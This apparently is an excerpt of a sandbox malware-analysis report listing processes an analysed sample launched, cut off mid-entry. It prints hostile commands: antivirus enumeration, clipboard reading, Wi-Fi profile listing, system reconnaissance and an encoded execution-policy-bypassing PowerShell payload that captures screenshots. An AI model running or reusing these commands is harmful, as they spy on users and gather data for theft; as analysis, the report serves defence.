                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:40
                                                                                                                                                                                                                                        Start time:16:12:09
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:41
                                                                                                                                                                                                                                        Start time:16:12:09
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                                                                                                                                                                                                                        Imagebase:0x7ff6ab520000
                                                                                                                                                                                                                                        File size:576'000 bytes
                                                                                                                                                                                                                                        MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:42
                                                                                                                                                                                                                                        Start time:16:12:09
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:43
                                                                                                                                                                                                                                        Start time:16:12:09
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:44
                                                                                                                                                                                                                                        Start time:16:12:10
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                        Imagebase:0x7ff63d290000
                                                                                                                                                                                                                                        File size:106'496 bytes
                                                                                                                                                                                                                                        MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:45
                                                                                                                                                                                                                                        Start time:16:12:10
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:powershell Get-Clipboard
                                                                                                                                                                                                                                        Imagebase:0x7ff7be880000
                                                                                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:46
                                                                                                                                                                                                                                        Start time:16:12:11
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                        Imagebase:0x7ff6fc730000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:47
                                                                                                                                                                                                                                        Start time:16:12:11
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "systeminfo"
                                                                                                                                                                                                                                        Imagebase:0x7ff6fc730000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:48
                                                                                                                                                                                                                                        Start time:16:12:11
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                                                                                                                                                                                                                        Imagebase:0x7ff6fc730000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:49
                                                                                                                                                                                                                                        Start time:16:12:11
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                                                                                                                                                                                                                        Imagebase:0x7ff6fc730000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:50
                                                                                                                                                                                                                                        Start time:16:12:11
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:51
                                                                                                                                                                                                                                        Start time:16:12:11
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:52
                                                                                                                                                                                                                                        Start time:16:12:11
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:53
                                                                                                                                                                                                                                        Start time:16:12:11
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:54
                                                                                                                                                                                                                                        Start time:16:12:11
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:tree /A /F
                                                                                                                                                                                                                                        Imagebase:0x7ff6cb6b0000
                                                                                                                                                                                                                                        File size:20'992 bytes
                                                                                                                                                                                                                                        MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:55
                                                                                                                                                                                                                                        Start time:16:12:11
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\systeminfo.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:systeminfo
                                                                                                                                                                                                                                        Imagebase:0x7ff6f9250000
                                                                                                                                                                                                                                        File size:110'080 bytes
                                                                                                                                                                                                                                        MD5 hash:EE309A9C61511E907D87B10EF226FDCD
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:56
                                                                                                                                                                                                                                        Start time:16:12:11
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\netsh.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:netsh wlan show profile
                                                                                                                                                                                                                                        Imagebase:0x7ff7e6640000
                                                                                                                                                                                                                                        File size:96'768 bytes
                                                                                                                                                                                                                                        MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:57
                                                                                                                                                                                                                                        Start time:16:12:11
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                                                                                                                                                                                                        Imagebase:0x7ff7be880000
                                                                                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:58
                                                                                                                                                                                                                                        Start time:16:12:13
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                        Imagebase:0x7ff6fc730000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:59
                                                                                                                                                                                                                                        Start time:16:12:13
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:60
                                                                                                                                                                                                                                        Start time:16:12:13
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\SIHClient.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\System32\sihclient.exe /cv QZj+5JUF0k+XXwZK8rpr7Q.0.2
                                                                                                                                                                                                                                        Imagebase:0x7ff766750000
                                                                                                                                                                                                                                        File size:380'720 bytes
                                                                                                                                                                                                                                        MD5 hash:8BE47315BF30475EEECE8E39599E9273
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:61
                                                                                                                                                                                                                                        Start time:16:12:13
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
